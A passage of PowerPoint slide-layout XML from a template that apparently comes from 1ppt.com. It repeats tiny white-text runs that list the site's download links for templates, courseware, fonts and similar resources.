              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout68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68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68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68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69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69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69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69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69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69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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout69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69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69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69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70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70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70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70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70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70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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout70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70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70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70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71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71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71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71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71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71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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
